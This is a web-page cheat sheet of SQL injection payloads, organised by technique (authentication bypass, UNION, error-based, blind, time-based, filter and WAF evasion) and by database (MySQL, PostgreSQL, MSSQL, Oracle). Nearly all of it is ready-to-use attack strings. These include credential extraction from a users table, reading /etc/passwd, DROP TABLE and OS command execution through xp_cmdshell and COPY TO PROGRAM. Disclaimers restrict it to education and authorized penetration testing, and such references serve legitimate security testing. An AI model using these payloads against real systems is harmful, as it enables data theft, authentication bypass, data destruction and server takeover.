SQL Injection Cheat Sheet
๐ง Basic SQL Injection
' OR '1'='1' OR 1=1 --" OR 1=1 --' OR 'a'='a') OR ('1'='1
๐ Authentication Bypass
' OR '1'='1' --' OR '1'='1' /*' OR 1=1#admin' --
๐ UNION-Based SQL Injection
Find column count:
' ORDER BY 1--' ORDER BY 2--
Using UNION:
' UNION SELECT null, null --' UNION SELECT 1,2,3 --' UNION SELECT username, password FROM users --
๐ฅ️ Error-Based SQL Injection
' AND 1=CONVERT(int, (SELECT @@version)) --' AND 1=CAST((SELECT user()) AS int) --
๐งช Blind SQL Injection
' AND 1=1 -- (True)' AND 1=2 -- (False)' AND substring(@@version,1,1)='5' --' AND ASCII(SUBSTRING((SELECT database()),1,1))=100 --
⏱️ Time-Based Blind SQL Injection
' OR IF(1=1, SLEEP(5), 0) --(MySQL)'; IF (1=1) WAITFOR DELAY '0:0:5'--(MSSQL)
๐ก️ WAF Bypass & Obfuscation
%27 OR %271%27=%271(URL encoded)'/**/OR/**/'1'='1' OR 1=1-- -')/**/OR/**/(1=1)--UN/**/ION SEL/**/ECT
๐ Extracting Data
' UNION SELECT table_name, null FROM information_schema.tables --' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name='users' --' UNION SELECT username, password FROM users --
๐ Useful Functions (MySQL)
database()version()user()@@datadirLOAD_FILE('/etc/passwd')INFORMATION_SCHEMA.TABLES
๐ MySQL Comments & Tricks
--(Comment)#(Comment)/* comment */' /*!UNION*/ SELECT
๐งฌ Stack Queries (MSSQL)
'; DROP TABLE users --'; EXEC xp_cmdshell('whoami') --
๐ Bypass Filters
'OR'1'='1'||(SELECT 1)=1' AND CHAR(124)+CHAR(124)+(SELECT 1)=1
๐ Disclaimer
This cheat sheet is intended for educational purposes, penetration testing in authorized environments, and improving application security. Do not use these techniques on systems without explicit permission.
๐ SQL Injection Cheat Sheet by DBMS
Note: Syntax may vary depending on the database. Always tailor payloads to the specific backend.
๐ข️ MySQL
- Version:
SELECT @@version; - Current User:
SELECT user(); - Current DB:
SELECT database(); - List DBs:
SELECT schema_name FROM information_schema.schemata; - List Tables:
SELECT table_name FROM information_schema.tables WHERE table_schema='target_db'; - List Columns:
SELECT column_name FROM information_schema.columns WHERE table_name='target_table'; - Read File:
SELECT LOAD_FILE('/etc/passwd'); - Time Delay:
SLEEP(5) - Comment Syntax:
--|#|/* */
๐ PostgreSQL
- Version:
SELECT version(); - Current User:
SELECT current_user; - Current DB:
SELECT current_database(); - List Tables:
SELECT table_name FROM information_schema.tables WHERE table_schema='public'; - List Columns:
SELECT column_name FROM information_schema.columns WHERE table_name='target_table'; - Time Delay:
pg_sleep(5); - Command Execution (with permissions):
COPY (SELECT '') TO PROGRAM 'id'; - Comment Syntax:
--
๐ฆพ Microsoft SQL Server
- Version:
SELECT @@version; - Current User:
SELECT SYSTEM_USER; - Current DB:
SELECT DB_NAME(); - List DBs:
SELECT name FROM master..sysdatabases; - List Tables:
SELECT name FROM sysobjects WHERE xtype='U'; - Command Execution:
EXEC xp_cmdshell 'whoami'; - Time Delay:
WAITFOR DELAY '0:0:5'; - Comment Syntax:
--|/* */
๐ถ Oracle
- Version:
SELECT * FROM v$version; - Current User:
SELECT user FROM dual; - Current DB:
SELECT ora_database_name FROM dual; - List Tables:
SELECT table_name FROM all_tables; - List Columns:
SELECT column_name FROM all_tab_columns WHERE table_name='TARGET_TABLE'; - Time Delay:
DBMS_LOCK.SLEEP(5); - Command Execution:
Java procedures or external tables (if configured) - Comment Syntax:
--|/* */
๐งช Generic Injection Payloads
' OR '1'='1 --' OR 1=1 --' UNION SELECT null,null --' AND 1=0 UNION SELECT username, password FROM users --
๐ก️ Filter Bypass Tricks
'/**/OR/**/'1'='1UNION%0ASELECT' OR 1=1-- -CHAR(97)+CHAR(98)+CHAR(99)(for 'abc')
⚠️ Disclaimer
This content is for educational and authorized penetration testing only. Do not attempt to exploit systems without proper legal consent.
0 Comments